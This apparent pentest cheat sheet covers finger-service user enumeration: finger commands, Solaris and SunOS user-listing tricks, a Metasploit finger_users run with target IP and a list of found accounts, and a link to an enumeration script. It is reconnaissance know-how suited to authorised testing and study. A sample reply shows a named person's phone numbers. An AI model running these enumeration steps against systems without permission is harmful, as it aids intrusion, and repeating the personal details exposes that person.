Finger is a program you can use to find information about computer users.
Finger Enumeration
finger @TARGET-IP
Finger a Specific Username
finger [email protected]
Login: admin Name: Jason L. Nawrocki
Directory: /home/admin Shell: /bin/bash
Office: 5877, 989-905-2731 Home Phone: 978-272-5420
Never logged in.
No mail.
No Plan.
Solaris bug that shows all logged in users:
finger 0@host
SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN
finger 'a b c d e f g h'@sunhost
Modules:
msf5 > search finger
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/mybb_db_fingerprint 2014-02-13 normal Yes MyBB Database Fingerprint
2 auxiliary/scanner/finger/finger_users normal Yes Finger Service User Enumerator
3 auxiliary/scanner/oracle/isqlplus_login normal Yes Oracle iSQL*Plus Login Utility
4 auxiliary/scanner/oracle/isqlplus_sidbrute normal Yes Oracle iSQLPlus SID Check
5 auxiliary/scanner/vmware/esx_fingerprint normal Yes VMWare ESX/ESXi Fingerprint Scanner
6 auxiliary/server/browser_autopwn normal No HTTP Client Automatic Exploiter
7 exploit/bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow
8 exploit/windows/http/bea_weblogic_post_bof 2008-07-17 great Yes Oracle Weblogic Apache Connector POST Request Buffer Overflow
9 post/windows/gather/enum_putty_saved_sessions normal No PuTTY Saved Sessions Enumeration Module
Find users:
msf5 > use auxiliary/scanner/finger/finger_users
msf5 auxiliary(scanner/finger/finger_users) > show options
Module options (auxiliary/scanner/finger/finger_users):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 79 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
USERS_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt yes The file that contains a list of default UNIX accounts.
msf5 auxiliary(scanner/finger/finger_users) > setg rhosts 192.186.218.3
rhosts => 192.186.218.3
msf5 auxiliary(scanner/finger/finger_users) > run
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: admin
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: administrator
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: backup
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: bin
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: daemon
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: dbadmin
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: diag
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: games
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: gnats
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: gopher
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: irc
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: list
[+] 192.186.218.3:79 - 192.186.218.3:79 - Found user: lp
[+] 192.186.218.3:79 - 192.186.218.3:79 Users found: admin, administrator, backup, bin, daemon, dbadmin, diag, games, gnats, gopher, irc, list, lp, mail, man, news, nobody, proxy, root, saned, sync, sys, systemd-bus-proxy, udadmin, uucp, webmaster, www-data
[*] 192.186.218.3:79 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Download script and run it with a wordlist:
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
Overview